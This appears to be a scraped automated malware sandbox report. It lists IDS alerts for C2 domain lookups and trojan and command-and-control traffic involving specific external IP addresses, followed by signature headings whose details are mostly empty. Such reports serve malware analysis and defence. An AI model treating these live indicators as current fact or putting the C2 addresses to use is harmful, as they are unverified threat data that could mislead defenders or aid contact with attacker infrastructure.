2024-12-14T21:58:22.361859+0100 | 2058220 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 50294 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:52.796565+0100 | 2057977 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 60276 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:03.361554+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 52481 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:53.748810+0100 | 2057969 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 64076 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:53.494844+0100 | 2057971 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 56136 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:52.057017+0100 | 2057983 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 55914 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:09.966196+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 61255 | 1.1.1.1 | 53 | UDP |
2024-12-14T21:58:24.440770+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49816 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:01.068509+0100 | 2058230 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 63277 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:09.256527+0100 | 2058236 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 56812 | 1.1.1.1 | 53 | UDP |
2024-12-14T21:58:23.534629+0100 | 2058236 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 62925 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:52.288187+0100 | 2057981 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49515 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:04.939789+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 116.203.12.241 | 443 | 192.168.2.4 | 49917 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:07.292057+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 116.203.12.241 | 443 | 192.168.2.4 | 49926 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:04.939217+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.4 | 49917 | 116.203.12.241 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:04.840686+0100 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 185.215.113.43 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:20.551932+0100 | 2856122 | 1 | A Network Trojan was detected | 185.215.113.43 | 80 | 192.168.2.4 | 49760 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:09.279062+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49763 | 31.41.244.11 | 80 | TCP |
2024-12-14T21:57:23.393204+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49798 | 31.41.244.11 | 80 | TCP |
2024-12-14T21:57:31.883360+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49826 | 31.41.244.11 | 80 | TCP |
2024-12-14T21:57:44.084227+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49859 | 31.41.244.11 | 80 | TCP |
2024-12-14T21:57:50.858814+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49876 | 31.41.244.11 | 80 | TCP |
2024-12-14T21:57:57.003983+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49897 | 185.215.113.16 | 80 | TCP |
2024-12-14T21:58:05.417410+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49923 | 185.215.113.16 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:56.330372+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49891 | 23.67.133.187 | 443 | TCP |
2024-12-14T21:58:12.753570+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49944 | 23.67.133.187 | 443 | TCP |
2024-12-14T21:58:27.290135+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49995 | 23.67.133.187 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:10.919081+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.127.228 | 3512 | 192.168.2.4 | 49927 | TCP |
2024-12-14T21:58:40.915294+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 87.120.127.228 | 3512 | 192.168.2.4 | 49927 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: | ||
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Bitcoin Miner |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Compliance |
---|
Source: | Unpacked PE file: |
Source: | Static PE information: |
Source: | File opened: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | |||
Source: | File opened: | Jump to behavior |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | IPs: |
Source: | Registry value created: | Jump to behavior |
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | Process created: |
Source: | File source: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |